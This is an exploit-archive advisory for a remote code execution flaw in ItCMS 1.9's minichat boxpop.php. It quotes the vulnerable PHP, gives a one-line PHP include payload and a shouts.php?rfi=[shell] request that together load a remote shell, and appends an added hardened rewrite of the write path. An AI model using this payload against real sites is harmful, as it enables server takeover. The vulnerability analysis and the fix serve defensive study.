
ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability

Author: Cod3rZ
Risk: Security Risk Unsorted
0day-ID: 0day-ID-2947
Category: web applications
Date added: 01-05-2008
Platform: unsorted
==========================================================
ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability
==========================================================



#===========================================================================================================================#
#                                     _ ____             _        _ _                _                                      #
#                          __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                    #
#                         / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                   #
#                         \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                   #
#===========================================================================================================================#
#                                              ItCMS 1.9 Remote File Rewriting                                              #
#===========================================================================================================================#
#                                                      Author : Cod3rZ                                                      #
#===========================================================================================================================#
# Remote File Rewriting:                                                                                                    #
#===========================================================================================================================#
# /box/minichat/boxpop.php                                                                                                  #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){                                                                                                 #
# $shout = $_POST['shout'];                                                                                                 #
# } else if ($_GET["shout"]!=""){                                                                                           #
# $shout = $_GET["shout"];                                                                                                  #
# }                                                                                                                         #
# [...]                                                                                                                     #
# $shout = trim($shout);                                                                                                    #
# $shout = stripslashes($shout);                                                                                            #
# $shout = str_replace ("\r\n", " [br] ", $shout);                                                                          #
# $shout = first($shout);                                                                                                   #
# [...]                                                                                                                     #
# $FileName="data/shouts.php";                                                                                              #
# if($FilePointer=fopen($FileName, "a+")){                                                                                  #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n");                                       #
# fclose($FilePointer);                                                                                                     #
#===========================================================================================================================#
# So we can write malicious code such as <?php include($_GET['rfi']); ?> into the variable $shout,                          #
# and then request data/shouts.php?rfi=[shell]                                                                              #
#===========================================================================================================================#
# There are many other bugs; find them yourself                                                                             #
#===========================================================================================================================#
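
The root cause shown above is that request data is appended as-is to data/shouts.php, a file the web server executes as PHP. The following is an added example of a hardened write path, not code from ItCMS or from the advisory author; SHOUT_STORE, both function names, the 'name' POST field and the date/time formats are assumptions, and the storage directory is assumed to exist and be writable.

```php
<?php
// Added example, not ItCMS code. SHOUT_STORE, both function names, the
// 'name' POST field and the date/time formats are assumptions.

// Assumed location outside the document root, with an extension the web
// server does not hand to the PHP interpreter.
const SHOUT_STORE = __DIR__ . '/../private/shouts.dat';

// Make one field safe for the "|^|"-delimited, one-record-per-line format.
function shout_clean_field(string $value, int $maxLen = 500): string
{
    $value = str_replace("\r\n", ' [br] ', trim($value)); // as in the original
    // Remaining control characters (bare CR/LF included) could start a new record.
    $value = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $value) ?? '';
    // Truncate before encoding so an entity is never cut in half.
    $value = substr($value, 0, $maxLen);
    // "<?php" is stored as "&lt;?php": inert to PHP and to a browser that
    // later renders the shout. ENT_SUBSTITUTE repairs a split UTF-8 sequence.
    $value = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // Encode every pipe as well, so user text can never contain "|^|".
    return str_replace('|', '&#124;', $value);
}

// Append one record; returns false on an invalid address or a failed write.
function shout_append(string $name, string $shout, string $ip): bool
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return false;
    }
    $record = implode('|^|', [
        shout_clean_field($name, 40),
        shout_clean_field($shout),
        date('d-m-Y'),
        date('H:i'),
        $ip,
    ]) . "|^|\n";
    // LOCK_EX keeps concurrent requests from interleaving their records.
    return file_put_contents(SHOUT_STORE, $record, FILE_APPEND | LOCK_EX) !== false;
}

// Accept the message over POST only; the original also honoured $_GET["shout"].
$isPost = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST';
if ($isPost && is_string($_POST['shout'] ?? null) && trim($_POST['shout']) !== '') {
    $name = is_string($_POST['name'] ?? null) ? $_POST['name'] : 'guest';
    shout_append($name, $_POST['shout'], $_SERVER['REMOTE_ADDR'] ?? '');
}
```

Because the stored fields are already HTML-encoded, the page that displays shouts must print them without encoding a second time.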



#  0day.today [2024-11-16]  #